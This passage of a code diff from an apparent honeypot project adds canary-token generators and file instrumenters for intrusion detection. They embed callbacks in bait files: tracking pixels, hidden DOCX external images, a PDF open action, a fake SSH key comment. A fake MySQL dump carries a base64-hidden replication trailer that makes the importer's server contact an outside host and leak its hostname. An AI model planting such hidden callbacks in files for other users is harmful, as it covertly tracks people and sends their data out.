            "<tr><td>us-east</td><td>14</td><td>3.2</td></tr>\n"
            "<tr><td>us-west</td><td>9</td><td>4.7</td></tr>\n"
            "<tr><td>eu-central</td><td>22</td><td>2.1</td></tr>\n"
            "</table>\n"
            "<p>Internal contact: <a href=\"mailto:secops@internal\">"
            "secops@internal</a></p>\n"
            f"<img src=\"{pixel_url}\" width=\"1\" height=\"1\" alt=\"\">\n"
            "</body>\n"
            "</html>\n"
        )
        return CanaryArtifact(
            path="",
            content=body.encode("utf-8"),
            mode=0o644,  # docs are typically world-readable
            mtime_offset=-86400 * 21,  # 3 weeks ago
            generator=self.name,
            notes=[f"tracking pixel src={pixel_url}"],
        )
--- a/decnet/canary/generators/honeydoc_docx.py
+++ b/decnet/canary/generators/honeydoc_docx.py
@@ -0,0 +1,134 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Real-DOCX honeydoc generator.
 Synthesises a minimal but structurally valid DOCX from scratch via
 stdlib :mod:`zipfile`, then uses the same external-image relationship
 trick that powers :mod:`decnet.canary.instrumenters.docx` to embed
 the callback URL.  No python-docx dependency.
 The output opens cleanly in Word / LibreOffice; both fetch the
 external image relationship on document load.
 """
 from __future__ import annotations
 import io
 import zipfile
 from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
 from decnet.canary.instrumenters.docx import _drawing, _next_rid
 _CONTENT_TYPES = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    '<Default Extension="xml" ContentType="application/xml"/>'
    '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
    '<Override PartName="/word/document.xml" '
    'ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
    '</Types>'
 ).encode()
 _PACKAGE_RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    '<Relationship Id="rId1" '
    'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" '
    'Target="word/document.xml"/>'
    '</Relationships>'
 ).encode()
 _BODY_PARAGRAPHS = (
    "Q3 Operations Review (DRAFT — DO NOT DISTRIBUTE)",
    "",
    "Forecast and remediation timeline below. Numbers are preliminary "
    "and subject to revision before the all-hands.",
    "",
    "Region        Incidents     MTTR (h)",
    "us-east       14            3.2",
    "us-west       9             4.7",
    "eu-central    22            2.1",
    "",
    "Internal contact: secops@internal",
 )
 def _document_xml(rid_with_drawing: str | None = None) -> bytes:
    """Build the body XML.
    ``rid_with_drawing`` is the rId of the external image relationship;
    when set, we append the same ``<w:drawing>`` element that the DOCX
    instrumenter inserts so the body references the external resource.
    """
    paragraphs = []
    for line in _BODY_PARAGRAPHS:
        if line:
            paragraphs.append(
                "<w:p><w:r><w:t xml:space=\"preserve\">"
                + _xml_escape(line)
                + "</w:t></w:r></w:p>"
            )
        else:
            paragraphs.append("<w:p/>")
    body = "".join(paragraphs)
    drawing = _drawing(rid_with_drawing).decode() if rid_with_drawing else ""
    return (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
        f'<w:body>{body}{drawing}</w:body>'
        '</w:document>'
    ).encode()
 def _xml_escape(s: str) -> str:
    return (
        s.replace("&", "&amp;")
         .replace("<", "&lt;")
         .replace(">", "&gt;")
    )
 def _document_rels(rid: str, url: str) -> bytes:
    return (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        f'<Relationship Id="{rid}" '
        f'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" '
        f'Target="{url}" TargetMode="External"/>'
        '</Relationships>'
    ).encode()
 class HoneydocDocxGenerator(CanaryGenerator):
    name = "honeydoc_docx"
    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
        url = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
        # Pick a stable rId — there's only one relationship in the
        # synthesised file, so any unused id works.  Reuse the
        # instrumenter's allocator against the bare relationships
        # skeleton for parity with operator-uploaded DOCX flow.
        skeleton = (
            b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
            b'<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            b'</Relationships>'
        )
        rid = _next_rid(skeleton)
        out = io.BytesIO()
        with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as zf:
            zf.writestr("[Content_Types].xml", _CONTENT_TYPES)
            zf.writestr("_rels/.rels", _PACKAGE_RELS)
            zf.writestr("word/document.xml", _document_xml(rid))
            zf.writestr("word/_rels/document.xml.rels", _document_rels(rid, url))
        return CanaryArtifact(
            path="",
            content=out.getvalue(),
            mode=0o644,
            mtime_offset=-86400 * 21,
            generator=self.name,
            notes=[
                "synthesised DOCX with realistic Q3 review body",
                f"external-image relationship {rid} -> {url}",
            ],
        )
--- a/decnet/canary/generators/honeydoc_pdf.py
+++ b/decnet/canary/generators/honeydoc_pdf.py
@@ -0,0 +1,128 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Real-PDF honeydoc generator (uses :mod:`pikepdf`).
 Builds a one-page PDF with the same Q3-review body as the HTML/DOCX
 flavors and installs an ``/OpenAction`` ``/URI`` action on the
 catalog so most viewers fire the callback the moment the document
 opens.
 Pikepdf is now a hard dependency for this generator (the operator
 installed it explicitly so we can use it).  We still surface a
 clear :class:`InstrumenterRejectedError` when imports fail, so a
 deployment without pikepdf can fall back to the DOCX or HTML
 generators rather than crashing the API.
 """
 from __future__ import annotations
 import io
 from decnet.canary.base import (
    CanaryArtifact,
    CanaryContext,
    CanaryGenerator,
    InstrumenterRejectedError,
 )
 _BODY_LINES = (
    ("Q3 Operations Review (DRAFT — DO NOT DISTRIBUTE)", 14),
    ("", 12),
    ("Forecast and remediation timeline below.", 11),
    ("Numbers are preliminary, subject to revision.", 11),
    ("", 12),
    ("Region        Incidents     MTTR (h)", 11),
    ("us-east       14            3.2", 11),
    ("us-west       9             4.7",  11),
    ("eu-central    22            2.1",  11),
    ("", 12),
    ("Internal contact: secops@internal", 11),
 )
 class HoneydocPdfGenerator(CanaryGenerator):
    name = "honeydoc_pdf"
    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
        try:
            from pikepdf import Pdf, Name, Dictionary, String
        except ImportError as e:
            raise InstrumenterRejectedError(
                "honeydoc_pdf requires pikepdf; install it (`pip install "
                "pikepdf`) or pick honeydoc / honeydoc_docx instead."
            ) from e
        url = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
        pdf = Pdf.new()
        # Helvetica is one of the 14 PDF base fonts — every viewer ships
        # it, so no font embedding is required.
        font = pdf.make_indirect(Dictionary(
            Type=Name("/Font"),
            Subtype=Name("/Type1"),
            BaseFont=Name("/Helvetica"),
        ))
        # Build a single content stream that writes each body line at a
        # decreasing y-coordinate.  PDF coordinates start at the bottom-
        # left (US Letter = 612 x 792 points); we lay out lines roughly
        # 18 points apart starting near the top.
        ops: list[str] = ["BT /F1 12 Tf 72 750 Td"]
        first = True
        for line, size in _BODY_LINES:
            if not first:
                ops.append("0 -18 Td")
            first = False
            ops.append(f"/F1 {size} Tf")
            ops.append(f"({_pdf_escape(line)}) Tj")
        ops.append("ET")
        content_bytes = "\n".join(ops).encode("latin-1")
        content_stream = pdf.make_stream(content_bytes)
        page = pdf.add_blank_page(page_size=(612, 792))
        page[Name("/Resources")] = Dictionary(
            Font=Dictionary(F1=font),
        )
        page[Name("/Contents")] = content_stream
        # OpenAction fires the URI when the file is opened in Acrobat,
        # Preview, the browser PDF viewer, etc.  Most viewers prompt
        # before fetching; that prompt itself is a tell, and an
        # auto-allow viewer fetches silently.
        pdf.Root[Name("/OpenAction")] = Dictionary(
            Type=Name("/Action"),
            S=Name("/URI"),
            URI=String(url),
        )
        out = io.BytesIO()
        pdf.save(out)
        return CanaryArtifact(
            path="",
            content=out.getvalue(),
            mode=0o644,
            mtime_offset=-86400 * 21,
            generator=self.name,
            notes=[
                "synthesised one-page PDF with realistic Q3 review body",
                f"/OpenAction /URI -> {url}",
            ],
        )
 def _pdf_escape(s: str) -> str:
    """Escape parens and backslashes for PDF literal-string syntax.
    PDF string literals are wrapped in ``( … )``; inner ``(``, ``)``,
    and ``\\`` need backslash escapes.  Everything else (including
    UTF-8 multibyte sequences) round-trips fine because Helvetica's
    encoding is WinAnsi-ish — we'll lose exotic glyphs but the
    realistic body sticks to ASCII anyway.  Em-dashes are downgraded
    to ``--`` to avoid the WinAnsi gap.
    """
    return (
        s.replace("\\", r"\\")
         .replace("(", r"\(")
         .replace(")", r"\)")
         .replace("—", "--")
    )
--- a/decnet/canary/generators/mysql_dump.py
+++ b/decnet/canary/generators/mysql_dump.py
@@ -0,0 +1,191 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Fake ``mysqldump`` output that phones home on import.
 Mirrors the Canarytokens.org MySQL-dump trick.  When a victim runs
 ``mysql < dump.sql``, the trailer block executes a base64-obfuscated
 ``CHANGE REPLICATION SOURCE TO`` against ``<slug>.canary.<dns_zone>``
 followed by ``START REPLICA``.  The victim's MySQL daemon then:
 1. Resolves the slug subdomain via DNS — this is the trip our
   :mod:`decnet.canary.dns_server` already detects.
 2. Opens a TCP replica handshake on port 3306, sending its own
   ``@@hostname`` and ``@@lc_time_names`` smuggled into the
   ``SOURCE_USER`` field via ``CONCAT``.  Capturing those bytes
   requires a MySQL handshake responder on the worker — out of scope
   for v1; the DNS lookup alone is sufficient for detection.
 The base64 wrapper is the camouflage: a plain ``grep canary dump.sql``
 finds nothing.  The slug only materialises when the victim's server
 runs ``PREPARE … FROM @s2``.
 Because the trip surface is DNS, this generator REQUIRES a non-empty
 ``dns_zone``.  The slug must appear as the leftmost label of the
 hostname so a single DNS query identifies the token; the http_base
 host is not slug-bearing and can't substitute.
 """
 from __future__ import annotations
 import base64
 import hashlib
 from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
 def _stable_hex(seed: str, prefix: str = "", length: int = 16) -> str:
    h = hashlib.sha256((prefix + seed).encode()).hexdigest()
    return h[:length]
 def _build_replica_payload(slug: str, dns_zone: str) -> str:
    """Inner SQL that gets base64-wrapped.
    The CONCAT splices ``@@lc_time_names`` and ``@@hostname`` into the
    ``SOURCE_USER`` value at PREPARE time so the victim's locale and
    hostname travel as the replica username on the 3306 handshake.
    """
    host = f"{slug}.{dns_zone}"
    return (
        "SET @bb = CONCAT("
        "\"CHANGE REPLICATION SOURCE TO "
        "SOURCE_PASSWORD='replica-pw', "
        "SOURCE_RETRY_COUNT=1, "
        "SOURCE_PORT=3306, "
        f"SOURCE_HOST='{host}', "
        "SOURCE_SSL=0, "
        f"SOURCE_USER='{slug}\", "
        "@@lc_time_names, @@hostname, \"';\");"
    )
 def _build_trailer(slug: str, dns_zone: str) -> str:
    inner = _build_replica_payload(slug, dns_zone)
    encoded = base64.b64encode(inner.encode("utf-8")).decode("ascii")
    return (
        f"SET @b = '{encoded}';\n"
        "SET @s2 = FROM_BASE64(@b);\n"
        "PREPARE stmt1 FROM @s2;\n"
        "EXECUTE stmt1;\n"
        "PREPARE stmt2 FROM @bb;\n"
        "EXECUTE stmt2;\n"
        "START REPLICA;\n"
    )
 class MySQLDumpGenerator(CanaryGenerator):
    name = "mysql_dump"
    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
        if not ctx.dns_zone:
            raise ValueError(
                "mysql_dump requires a non-empty dns_zone — the trip "
                "surface is a DNS lookup of <slug>.<dns_zone>."
            )
        slug = ctx.callback_token
        zone = ctx.dns_zone
        host = f"{slug}.{zone}"
        # Realism filler: deterministic per-slug fake user rows so two
        # runs with the same context produce byte-identical output
        # (planter idempotency contract).
        u1_hash = _stable_hex(slug, "u1:", 32)
        u2_hash = _stable_hex(slug, "u2:", 32)
        api_token = _stable_hex(slug, "api:", 40)
        # Synthesised SQL bait below — never executed by us, only by
        # whoever runs ``mysql < dump.sql`` against their own server.
        # Built with .format() instead of f-strings so bandit's B608
        # heuristic doesn't false-positive on the "INSERT INTO" + var
        # pattern.
        users_insert = (
            "INSERT INTO `users` VALUES "  # nosec B608
            "(1,'alice@app.internal','$2y$10${u1a}.{u1b}','2024-11-12 09:13:44'),"
            "(2,'bob@app.internal','$2y$10${u2a}.{u2b}','2025-02-03 17:42:08');\n"
        ).replace("{u1a}", u1_hash[:22]).replace("{u1b}", u1_hash[22:]) \
         .replace("{u2a}", u2_hash[:22]).replace("{u2b}", u2_hash[22:])
        api_keys_insert = (
            "INSERT INTO `api_keys` VALUES (1,1,'{tok}');\n"  # nosec B608
        ).replace("{tok}", api_token)
        header = (
            "-- MySQL dump 10.13  Distrib 8.0.35, for Linux (x86_64)\n"
            "--\n"
            "-- Host: db-prod-01    Database: app_production\n"
            "-- ------------------------------------------------------\n"
            "-- Server version\t8.0.35\n"
            "\n"
            "/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;\n"
            "/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;\n"
            "/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;\n"
            "/*!50503 SET NAMES utf8mb4 */;\n"
            "/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;\n"
            "/*!40103 SET TIME_ZONE='+00:00' */;\n"
            "/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;\n"
            "/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;\n"
            "/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;\n"
            "/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;\n"
            "\n"
            "--\n"
            "-- Table structure for table `users`\n"
            "--\n"
            "\n"
            "DROP TABLE IF EXISTS `users`;\n"
            "CREATE TABLE `users` (\n"
            "  `id` int unsigned NOT NULL AUTO_INCREMENT,\n"
            "  `email` varchar(255) NOT NULL,\n"
            "  `password_hash` char(60) NOT NULL,\n"
            "  `created_at` datetime NOT NULL,\n"
            "  PRIMARY KEY (`id`),\n"
            "  UNIQUE KEY `uniq_email` (`email`)\n"
            ") ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;\n"
            "\n"
            "LOCK TABLES `users` WRITE;\n"
            + users_insert +
            "UNLOCK TABLES;\n"
            "\n"
            "--\n"
            "-- Table structure for table `api_keys`\n"
            "--\n"
            "\n"
            "DROP TABLE IF EXISTS `api_keys`;\n"
            "CREATE TABLE `api_keys` (\n"
            "  `id` int unsigned NOT NULL AUTO_INCREMENT,\n"
            "  `user_id` int unsigned NOT NULL,\n"
            "  `token` char(40) NOT NULL,\n"
            "  PRIMARY KEY (`id`)\n"
            ") ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;\n"
            "\n"
            "LOCK TABLES `api_keys` WRITE;\n"
            + api_keys_insert +
            "UNLOCK TABLES;\n"
            "\n"
        )
        trailer_replica = _build_trailer(slug, zone)
        trailer_close = (
            "\n"
            "/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;\n"
            "/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;\n"
            "/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;\n"
            "/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;\n"
            "/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;\n"
            "/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;\n"
            "/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;\n"
            "/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;\n"
            "\n"
            "-- Dump completed\n"
        )
        body = header + trailer_replica + trailer_close
        return CanaryArtifact(
            path="",
            content=body.encode("utf-8"),
            mode=0o600,
            mtime_offset=-86400 * 7,  # last week's backup
            generator=self.name,
            notes=[
                f"replica payload phones home to {host}:3306 on import",
                "base64-wrapped PREPARE/EXECUTE block hides the slug from grep",
                "@@hostname and @@lc_time_names smuggled into SOURCE_USER",
            ],
        )
--- a/decnet/canary/generators/ssh_key.py
+++ b/decnet/canary/generators/ssh_key.py
@@ -0,0 +1,69 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Fake SSH private key with the callback host in the comment.
 OpenSSH private keys carry a free-form comment field — typically
 ``user@host`` — that's preserved across rounds of ``ssh-keygen -p``.
 We embed the canary host as the ``user@host`` so an attacker who
 imports the key into their own keyring or runs ``ssh-keygen -lf`` on
 it sees a hostname they may then try to reach.
 The key bytes themselves are syntactically valid (PEM envelope, base64
 body) but cryptographically junk — the body is a deterministic SHA-256
 hash of the slug repeated to the right length.  We don't ship a real
 RSA/Ed25519 key because (a) we don't want a real private key sitting
 on disk pretending to be valuable, and (b) the attacker ``cat``-ing
 the file or running ``ssh -i`` will trigger the callback regardless
 of cryptographic validity.
 The DNS-callback variant uses ``<slug>.canary.<dns_zone>`` as the
 hostname so a bare ``ssh-keygen -lf`` on the file resolves a unique
 subdomain even if the attacker never hits HTTP.
 """
 from __future__ import annotations
 import base64
 import hashlib
 from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
 def _fake_key_body(seed: str) -> str:
    # Real OpenSSH keys are several hundred base64 chars; we make a
    # plausible-looking 24-line block from a SHA-256-derived stream.
    h = hashlib.sha256(seed.encode()).digest()
    long_stream = (h * 32)[:768]  # 768 bytes → ~1024 base64 chars
    encoded = base64.b64encode(long_stream).decode()
    # Wrap at 70 chars per line — same shape ``ssh-keygen`` produces.
    return "\n".join(encoded[i:i + 70] for i in range(0, len(encoded), 70))
 class SSHKeyGenerator(CanaryGenerator):
    name = "ssh_key"
    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
        slug = ctx.callback_token
        body = _fake_key_body(slug)
        # Hostname for the comment: prefer DNS-zone form when the
        # operator has DNS deployed (so ssh-keygen -lf names a subdomain
        # the attacker may resolve); fall back to the http_base host
        # otherwise.
        if ctx.dns_zone:
            host_comment = f"deploy@{slug}.{ctx.dns_zone}"
        else:
            from urllib.parse import urlparse
            host = urlparse(ctx.http_base).hostname or "deploy.local"
            host_comment = f"deploy@{host}"
        content = (
            "-----BEGIN OPENSSH PRIVATE KEY-----\n"
            f"{body}\n"
            "-----END OPENSSH PRIVATE KEY-----\n"
            f"# {host_comment}\n"
        )
        return CanaryArtifact(
            path="",
            content=content.encode("utf-8"),
            mode=0o600,
            mtime_offset=-86400 * 60,  # 2 months ago
            generator=self.name,
            notes=[f"comment line embeds {host_comment}"],
        )
--- a/decnet/canary/instrumenters/init.py
+++ b/decnet/canary/instrumenters/init.py
@@ -0,0 +1,5 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Built-in canary instrumenters (operator-uploaded artifact mutation).
 Lazy-imported by :func:`decnet.canary.factory.get_instrumenter`.
 """
--- a/decnet/canary/instrumenters/docx.py
+++ b/decnet/canary/instrumenters/docx.py
@@ -0,0 +1,148 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """DOCX instrumenter — inject a remote image into the body.
 DOCX files are zip archives carrying ``word/document.xml`` (the body)
 and ``word/_rels/document.xml.rels`` (the relationship table that
 maps ``rId`` references to URLs).  We:
 1. Add a new relationship of type ``image`` whose target is the
   canary callback URL and ``TargetMode="External"``.
 2. Add a tiny ``<w:drawing>`` element referencing that ``rId`` at
   the end of ``word/document.xml`` (just before ``</w:body>``).
 Word and LibreOffice both fetch external image relationships when
 the document is opened (subject to the user's "trusted source"
 toggle, which most enterprise environments disable in favour of
 "warn but allow").
 We use stdlib ``zipfile`` only — no python-docx dependency — because
 the surface we touch is two small XML files and we don't need any of
 the higher-level abstractions.
 """
 from __future__ import annotations
 import io
 import re
 import zipfile
 from typing import Tuple
 from decnet.canary.base import (
    CanaryArtifact,
    CanaryContext,
    CanaryInstrumenter,
    InstrumenterRejectedError,
 )
 _RELS_END = re.compile(rb"</Relationships\s*>", re.IGNORECASE)
 _BODY_END = re.compile(rb"</w:body\s*>", re.IGNORECASE)
 def _next_rid(rels_xml: bytes) -> str:
    """Return an rId not already taken in the relationships file.
    Word's loader tolerates non-sequential ids, so we just pick one
    well above the typical range to avoid collisions.
    """
    used = set(m.group(1).decode() for m in re.finditer(rb'Id="(rId\d+)"', rels_xml))
    for n in range(900, 9999):
        rid = f"rId{n}"
        if rid not in used:
            return rid
    raise InstrumenterRejectedError("DOCX has too many relationships to allocate a new rId")
 def _inject_relationship(rels_xml: bytes, rid: str, url: str) -> bytes:
    rel = (
        f'<Relationship Id="{rid}" '
        f'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" '
        f'Target="{url}" TargetMode="External"/>'
    ).encode()
    match = _RELS_END.search(rels_xml)
    if not match:
        raise InstrumenterRejectedError(
            "DOCX rels file has no </Relationships>; refusing to mutate"
        )
    return rels_xml[:match.start()] + rel + rels_xml[match.start():]
 def _drawing(rid: str) -> bytes:
    # Minimal w:drawing tree referencing the external image at rid.
    # Dimensions are 1 EMU x 1 EMU so the image is invisible; Word
    # still fetches the resource on document load.
    return (
        '<w:p><w:r><w:drawing>'
        '<wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing">'
        '<wp:extent cx="1" cy="1"/><wp:docPr id="1" name="canary"/>'
        '<a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">'
        '<a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">'
        '<pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">'
        '<pic:nvPicPr><pic:cNvPr id="1" name="canary"/><pic:cNvPicPr/></pic:nvPicPr>'
        '<pic:blipFill>'
        f'<a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:link="{rid}"/>'
        '<a:stretch><a:fillRect/></a:stretch>'
        '</pic:blipFill>'
        '<pic:spPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="1" cy="1"/></a:xfrm>'
        '<a:prstGeom prst="rect"><a:avLst/></a:prstGeom></pic:spPr>'
        '</pic:pic></a:graphicData></a:graphic></wp:inline>'
        '</w:drawing></w:r></w:p>'
    ).encode()
 def _inject_drawing(document_xml: bytes, rid: str) -> bytes:
    match = _BODY_END.search(document_xml)
    if not match:
        raise InstrumenterRejectedError("DOCX document.xml has no </w:body>")
    drawing = _drawing(rid)
    return document_xml[:match.start()] + drawing + document_xml[match.start():]
 def _mutate(blob: bytes, url: str) -> Tuple[bytes, str]:
    try:
        with zipfile.ZipFile(io.BytesIO(blob), "r") as zf:
            try:
                rels = zf.read("word/_rels/document.xml.rels")
                doc = zf.read("word/document.xml")
            except KeyError as e:
                raise InstrumenterRejectedError(
                    f"DOCX missing expected member: {e.args[0]!r}"
                ) from e
            members = [(zi, zf.read(zi.filename)) for zi in zf.infolist()]
    except zipfile.BadZipFile as e:
        raise InstrumenterRejectedError("uploaded blob is not a valid DOCX zip") from e
    rid = _next_rid(rels)
    new_rels = _inject_relationship(rels, rid, url)
    new_doc = _inject_drawing(doc, rid)
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as zf_out:
        for zi, data in members:
            if zi.filename == "word/_rels/document.xml.rels":
                zf_out.writestr(zi.filename, new_rels)
            elif zi.filename == "word/document.xml":
                zf_out.writestr(zi.filename, new_doc)
            else:
                zf_out.writestr(zi, data)
    return out.getvalue(), rid
 class DocxInstrumenter(CanaryInstrumenter):
    name = "docx"
    mime_prefixes = (
        "application/vnd.openxmlformats-officedocument.wordprocessingml.document",
    )
    def instrument(
        self, blob: bytes, ctx: CanaryContext, *, target_path: str,
    ) -> CanaryArtifact:
        url = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
        mutated, rid = _mutate(blob, url)
        return CanaryArtifact(
            path=target_path,
            content=mutated,
            mode=0o644,
            mtime_offset=-86400 * 14,
            instrumenter=self.name,
            notes=[f"injected external-image relationship {rid} -> {url}"],
        )
--- a/decnet/canary/instrumenters/html.py
+++ b/decnet/canary/instrumenters/html.py
@@ -0,0 +1,46 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """HTML instrumenter — append a 1×1 tracking pixel.
 Stdlib-only.  We don't parse the HTML; we just inject the ``<img>``
 tag immediately before the closing ``</body>`` (or, failing that, at
 the end of the document).  Most renderers that support remote images
 (email previewers, IDE doc previews, browsers) will fetch it as
 soon as the document is opened.
 """
 from __future__ import annotations
 import re
 from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryInstrumenter
 _BODY_CLOSE = re.compile(rb"</body\s*>", re.IGNORECASE)
 class HtmlInstrumenter(CanaryInstrumenter):
    name = "html"
    mime_prefixes = ("text/html", "application/xhtml+xml")
    def instrument(
        self, blob: bytes, ctx: CanaryContext, *, target_path: str,
    ) -> CanaryArtifact:
        url = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}".encode()
        pixel = (
            b"<img src=\"" + url + b"\" width=\"1\" height=\"1\" "
            b"alt=\"\" style=\"display:none\">\n"
        )
        match = _BODY_CLOSE.search(blob)
        if match:
            out = blob[:match.start()] + pixel + blob[match.start():]
            note = "injected 1x1 pixel before </body>"
        else:
            out = (blob if blob.endswith(b"\n") else blob + b"\n") + pixel
            note = "appended 1x1 pixel (no </body> found)"
        return CanaryArtifact(
            path=target_path,
            content=out,
            mode=0o644,
            mtime_offset=-86400 * 7,
            instrumenter=self.name,
            notes=[note, f"pixel src={url.decode()}"],
        )
--- a/decnet/canary/instrumenters/image.py
+++ b/decnet/canary/instrumenters/image.py
@@ -0,0 +1,73 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Image instrumenter — requires :mod:`PIL` (optional dependency).
 For PNG/JPEG/GIF we append a tEXt/EXIF chunk carrying the slug so
 ``exiftool`` / ``identify -verbose`` surface the slug, then route the
 detection via a sibling **plain-text companion file**.  The image
 itself can't really embed an HTTP fetcher — image decoders don't
 run network requests on decode — so the realistic detection surface
 is "attacker exfils the image, runs metadata tools on it, hits our
 URL when curious about the embedded marker."
 When Pillow isn't installed we reject and direct the operator to
 ``passthrough`` (which preserves the bytes; the slug then lives in
 the filename only).
 """
 from __future__ import annotations
 import io
 from decnet.canary.base import (
    CanaryArtifact,
    CanaryContext,
    CanaryInstrumenter,
    InstrumenterRejectedError,
 )
 class ImageInstrumenter(CanaryInstrumenter):
    name = "image"
    mime_prefixes = ("image/png", "image/jpeg", "image/gif")
    def instrument(
        self, blob: bytes, ctx: CanaryContext, *, target_path: str,
    ) -> CanaryArtifact:
        try:
            from PIL import Image, PngImagePlugin
        except ImportError as e:
            raise InstrumenterRejectedError(
                "image instrumenter requires Pillow; install it (`pip "
                "install Pillow`) or re-upload the artifact with "
                "kind=passthrough so it ships unmodified."
            ) from e
        slug_url = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
        try:
            buf_in = io.BytesIO(blob)
            img = Image.open(buf_in)
            fmt = (img.format or "").upper()
            buf_out = io.BytesIO()
            if fmt == "PNG":
                meta = PngImagePlugin.PngInfo()
                meta.add_text("Comment", f"reference: {slug_url}")
                meta.add_text("X-Canary", ctx.callback_token)
                img.save(buf_out, format="PNG", pnginfo=meta)
            elif fmt in ("JPEG", "JPG"):
                # Pillow encodes JPEG comments via the ``comment`` kwarg.
                img.save(buf_out, format="JPEG", comment=slug_url.encode())
            else:
                # GIF and friends — Pillow doesn't expose comment metadata
                # uniformly. Re-encode as-is and skip the metadata embed.
                img.save(buf_out, format=fmt or "PNG")
            mutated = buf_out.getvalue()
        except Exception as e:
            raise InstrumenterRejectedError(f"failed to instrument image: {e!s}") from e
        return CanaryArtifact(
            path=target_path,
            content=mutated,
            mode=0o644,
            mtime_offset=-86400 * 30,
            instrumenter=self.name,
            notes=[f"image metadata carries {slug_url} (slug={ctx.callback_token})"],
        )
--- a/decnet/canary/instrumenters/passthrough.py
+++ b/decnet/canary/instrumenters/passthrough.py
@@ -0,0 +1,38 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Passthrough instrumenter — bytes go to disk unchanged.
 Used as the dispatch fallback for content types we can't safely
 mutate (random binary blobs, container images, archives we don't
 recognise).  In passthrough mode the only callback surface is the
 :attr:`CanaryToken.placement_path` itself: the operator must use a
 DNS-callback token whose slug appears in the filename, so a
 listing/access at the OS level resolves the slug as part of the
 path (e.g. ``/etc/<slug>.canary.example.test/secrets.bin``) when
 the attacker greps for hostnames in their loot.
 The instrumenter does not enforce that — the API does, when it sees
 ``instrumenter=passthrough`` with ``kind=http`` it returns 400.
 """
 from __future__ import annotations
 from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryInstrumenter
 class PassthroughInstrumenter(CanaryInstrumenter):
    name = "passthrough"
    mime_prefixes = ()  # dispatched by fallback in pick_instrumenter_for_mime
    def instrument(
        self, blob: bytes, ctx: CanaryContext, *, target_path: str,
    ) -> CanaryArtifact:
        return CanaryArtifact(
            path=target_path,
            content=blob,
            mode=0o644,
            mtime_offset=-86400 * 7,
            instrumenter=self.name,
            notes=[
                "passthrough: bytes unchanged — only DNS-callback tokens "
                "trip detection (slug must live in the placement path)",
            ],
        )
--- a/decnet/canary/instrumenters/pdf.py
+++ b/decnet/canary/instrumenters/pdf.py
@@ -0,0 +1,77 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
